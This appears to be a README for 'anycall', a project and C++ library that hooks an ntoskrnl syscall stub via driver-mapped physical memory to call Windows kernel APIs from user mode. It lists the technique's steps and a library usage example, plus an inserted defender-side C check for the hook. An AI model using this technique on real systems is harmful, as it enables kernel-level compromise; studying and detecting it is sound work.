x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration
Read: https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html
- Allocate physical memory into user virtual memory
- Allows the user process to manipulate arbitrary physical memory without calling APIs
- Search the entire physical memory until the function stub to hook is found in the `ntoskrnl.exe` physical memory
- Once the stub is found, place an inline hook on the stub: simply `jmp rax`, so the detour address can be anything we want to invoke
- Simply `syscall` it: wow, we are in user mode but able to call kernel APIs
This project demonstrates how drivers that allow a user process to map physical memory work, and how critically vulnerable they are.
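A defender-side integrity check for the stub tampering described above, added here as an example and not part of the anycall project: it flags a kernel stub whose first bytes form a `mov rax, imm64` / `jmp rax` trampoline (the `mov` is an assumption; the page only names `jmp rax`) and compares a live stub against a reference copy. All byte strings are constructed samples.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Trampoline the inline hook described above leaves at the top of a stub.
 * Assumption (not stated on the page): the detour address is loaded with
 * mov rax, imm64 (48 B8 <imm64>) right before the page's "jmp rax" (FF E0). */
#define TRAMPOLINE_LEN 12

/* Returns the 64-bit detour target if `stub` starts with the
 * mov rax,imm64 / jmp rax trampoline, otherwise 0. */
uint64_t hook_target(const uint8_t *stub, size_t len)
{
    if (len < TRAMPOLINE_LEN) return 0;
    if (stub[0] != 0x48 || stub[1] != 0xB8) return 0;   /* mov rax, imm64 */
    if (stub[10] != 0xFF || stub[11] != 0xE0) return 0; /* jmp rax        */
    uint64_t target = 0;
    memcpy(&target, stub + 2, sizeof target);           /* little-endian imm64 */
    return target;
}

/* Shape-independent check: compare the live stub with a known-good copy
 * (e.g. the same bytes taken from the on-disk image). Returns the index
 * of the first differing byte, or -1 if the two are identical. */
int first_diff(const uint8_t *live, const uint8_t *reference, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (live[i] != reference[i]) return (int)i;
    return -1;
}

/* Constructed sample: an unmodified kernel-function prologue. */
static const uint8_t clean_stub[] = {
    0x48, 0x83, 0xEC, 0x28,                   /* sub rsp, 0x28      */
    0x4C, 0x8B, 0xD1,                         /* mov r10, rcx       */
    0x48, 0x8B, 0x0D, 0x11, 0x22, 0x33, 0x44, /* mov rcx, [rip+...] */
};
/* Constructed sample: the same stub after hooking, detour = 0xFFFFF80012345678. */
static const uint8_t hooked_stub[] = {
    0x48, 0xB8, 0x78, 0x56, 0x34, 0x12, 0x00, 0xF8, 0xFF, 0xFF, /* mov rax, imm64 */
    0xFF, 0xE0,                                                 /* jmp rax        */
};

int main(void)
{
    uint64_t t = hook_target(hooked_stub, sizeof hooked_stub);
    printf("hooked stub: detour %s (0x%llx)\n", t ? "found" : "absent", (unsigned long long)t);
    printf("clean stub : detour %s\n", hook_target(clean_stub, sizeof clean_stub) ? "found" : "absent");
    printf("first differing byte vs reference: %d\n", first_diff(hooked_stub, clean_stub, TRAMPOLINE_LEN));
    return 0;
}
```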
Related CVEs:
`libanycall` is a C++ static library that makes executing anycall exploits easier.

- Link it (e.g. `#pragma comment( lib, "libanycall64" )`)
- Include it (e.g. `#include "libanycall.h"`)
For example:

```cpp
#include <windows.h>
#include <cstdint>
#include <cstdio>
#include <iostream>
#include "libanycall.h"
#pragma comment( lib, "libanycall64" )

// signature of the kernel export we want to invoke
using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );

int main( const int argc, const char** argv, const char** envp )
{
    if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
    {
        printf( "[!] failed to init libanycall\n" );
        return EXIT_FAILURE;
    }

    // invoke NT kernel APIs from usermode
    const uint32_t process_id =
        ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );

    printf( "PsGetCurrentProcessId returns %u\n", process_id );

    return EXIT_SUCCESS;
}
```
License: MIT